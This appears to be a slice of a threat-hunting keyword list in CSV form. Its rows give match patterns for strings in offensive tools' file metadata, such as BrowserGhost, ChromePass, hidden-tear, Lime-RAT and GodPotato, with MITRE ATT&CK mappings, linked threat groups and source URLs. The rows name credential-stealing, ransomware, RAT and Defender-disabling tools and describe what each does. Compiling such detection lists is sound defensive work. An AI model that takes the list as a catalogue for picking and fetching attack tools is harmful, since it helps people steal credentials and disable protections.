"*>BrowserGhost<*",".{0,1000}\>BrowserGhost\<.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#productname","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","20352"
"*>BrowsingHistoryView<*",".{0,1000}\>BrowsingHistoryView\<.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20353"
"*>BulletsPassView<*",".{0,1000}\>BulletsPassView\<.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","20354"
"*>BypassAddUser<*",".{0,1000}\>BypassAddUser\<.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#productname","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","20355"
"*>C3WebController<*",".{0,1000}\>C3WebController\<.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#productname","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","20356"
"*>ChromePass<*",".{0,1000}\>ChromePass\<.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20357"
"*>Copyright * NYAN CAT 2018<*",".{0,1000}\>Copyright\s.{0,1000}\sNYAN\sCAT\s2018\<.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","20358"
"*>CreateAssignTokenVariant<*",".{0,1000}\>CreateAssignTokenVariant\<.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20359"
"*>CreateImpersonateTokenVariant<*",".{0,1000}\>CreateImpersonateTokenVariant\<.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20360"
"*>csexec<*",".{0,1000}\>csexec\<.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#companyname","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","20361"
"*>csexecsvc<*",".{0,1000}\>csexecsvc\<.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#servicename","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","20362"
"*>CursorSvc<*",".{0,1000}\>CursorSvc\<.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","20363"
"*>dControl v2.1<*",".{0,1000}\>dControl\sv2\.1\<.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","#description","N/A","10","10","N/A","N/A","N/A","N/A","20367"
"*>DeadPotato<*",".{0,1000}\>DeadPotato\<.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","20368"
"*>DebugInjectionVariant<*",".{0,1000}\>DebugInjectionVariant\<.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20369"
"*>DebugUpdateProcVariant<*",".{0,1000}\>DebugUpdateProcVariant\<.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20370"
"*>DecryptAutoLogon<*",".{0,1000}\>DecryptAutoLogon\<.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#productname","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","20371"
"*>DecryptAutoLogon<*",".{0,1000}\>DecryptAutoLogon\<.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","#productname","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","20372"
"*>DecryptTeamViewer<*",".{0,1000}\>DecryptTeamViewer\<.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#productname","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","20373"
"*>defender-control<*",".{0,1000}\>defender\-control\<.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#productname","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","20374"
"*>Dionach.ShareAudit<*",".{0,1000}\>Dionach\.ShareAudit\<.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#productname","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","20376"
"*>DirtyCLR<*",".{0,1000}\>DirtyCLR\<.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","N/A","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","20377"
"*>DIT Explorer<*",".{0,1000}\>DIT\sExplorer\<.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#productname","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","20380"
"*>Don HO don.h@free.fr<*",".{0,1000}\>Don\sHO\sdon\.h\@free\.fr\<.{0,1000}","offensive_tool_keyword","credhistview","This tool allows you to decrypt the CREDHIST file and view the SHA1 and NTLM hashes of all previous passwords you used on your system","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/credhist_view.html","1","0","#companyname","N/A","9","9","N/A","N/A","N/A","N/A","20381"
"*>EfsPotato<*",".{0,1000}\>EfsPotato\<.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#productname","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","20383"
"*>EfsPotato<*",".{0,1000}\>EfsPotato\<.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20384"
"*>Enables users to elevate themselves to administrator-level rights.<*",".{0,1000}\>Enables\susers\sto\selevate\sthemselves\sto\sadministrator\-level\srights\.\<.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","20387"
"*>Extracts wireless keys stored by Windows<*",".{0,1000}\>Extracts\swireless\skeys\sstored\sby\sWindows\<.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","0","#Description","N/A","7","10","N/A","N/A","N/A","N/A","20391"
"*>GMER Driver http://www.gmer.net<*",".{0,1000}\>GMER\sDriver\shttp\:\/\/www\.gmer\.net\<.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","#description","N/A","9","10","N/A","N/A","N/A","N/A","20400"
"*>GMSAPasswordReader<*",".{0,1000}\>GMSAPasswordReader\<.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20401"
"*>GMSAPasswordReader<*",".{0,1000}\>GMSAPasswordReader\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20402"
"*>GodPotato<*",".{0,1000}\>GodPotato\<.{0,1000}","offensive_tool_keyword","GodPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20403"
"*>GodPotato<*",".{0,1000}\>GodPotato\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20404"
"*>grabff<*",".{0,1000}\>grabff\<.{0,1000}","offensive_tool_keyword","GrabChrome","HelloKitty Grabber used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A","20406"
"*>Group3r<*",".{0,1000}\>Group3r\<.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#companyname","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","20407"
"*>hidden_tear_decrypter<*",".{0,1000}\>hidden_tear_decrypter\<.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","20409"
"*>hidden-tear.exe<*",".{0,1000}\>hidden\-tear\.exe\<.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","20410"
"*>hidden-tear<*",".{0,1000}\>hidden\-tear\<.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","20411"
"*>IE Pass View<*",".{0,1000}\>IE\sPass\sView\<.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20412"
"*>IE Passwords Viewer<*",".{0,1000}\>IE\sPasswords\sViewer\<.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20413"
"*>Imminent Monitor<*",".{0,1000}\>Imminent\sMonitor\<.{0,1000}","offensive_tool_keyword","Imminent-Monitor","used for malicious activities such as keylogging - screen capture and remote control of infected systems.","T1012 - T1059 - T1105 - T1071 - T1124 - T1041","TA0005 - TA0003 - TA0011 - TA0009","Imminent RAT","PROMETHIUM","Malware","https://github.com/Indestructible7/Imminent-Monitor-v3.9","1","0","#companyname","N/A","8","1","4","2","2022-11-04T18:48:14Z","2022-11-04T18:15:20Z","20414"
"*>-Infected Systems Database-</span>*",".{0,1000}\>\-Infected\sSystems\sDatabase\-\<\/span\>.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","20415"
"*>Jasmin Encryptor<*",".{0,1000}\>Jasmin\sEncryptor\<.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","20418"
"*>Jasmin Ransomware</div>*",".{0,1000}\>Jasmin\sRansomware\<\/div\>.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","20419"
"*>JSP Backdoor Reverse Shell<*",".{0,1000}\>JSP\sBackdoor\sReverse\sShell\<.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","20421"
"*>KeeFarceDLL<*",".{0,1000}\>KeeFarceDLL\<.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","20422"
"*>KeeTheft<*",".{0,1000}\>KeeTheft\<.{0,1000}","offensive_tool_keyword","KeeTheft","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","KeeTheft","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20423"
"*>KeeTheft<*",".{0,1000}\>KeeTheft\<.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","20424"
"*>KeeTheft<*",".{0,1000}\>KeeTheft\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","KeeTheft","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20425"
"*>KerberOPSEC</*",".{0,1000}\>KerberOPSEC\<\/.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","20426"
"*>Keylogger<*",".{0,1000}\>Keylogger\<.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#productname","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","20427"
"*>KrbRelay<*",".{0,1000}\>KrbRelay\<.{0,1000}","offensive_tool_keyword","KrbRelay","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20428"
"*>KrbRelay<*",".{0,1000}\>KrbRelay\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20429"
"*>LimeRAT.exe<*",".{0,1000}\>LimeRAT\.exe\<.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","20433"
"*>LostMyPassword<*",".{0,1000}\>LostMyPassword\<.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A","20434"
"*>Make Me Admin<*",".{0,1000}\>Make\sMe\sAdmin\<.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","20436"
"*>MakeMeAdmin<*",".{0,1000}\>MakeMeAdmin\<.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","20437"
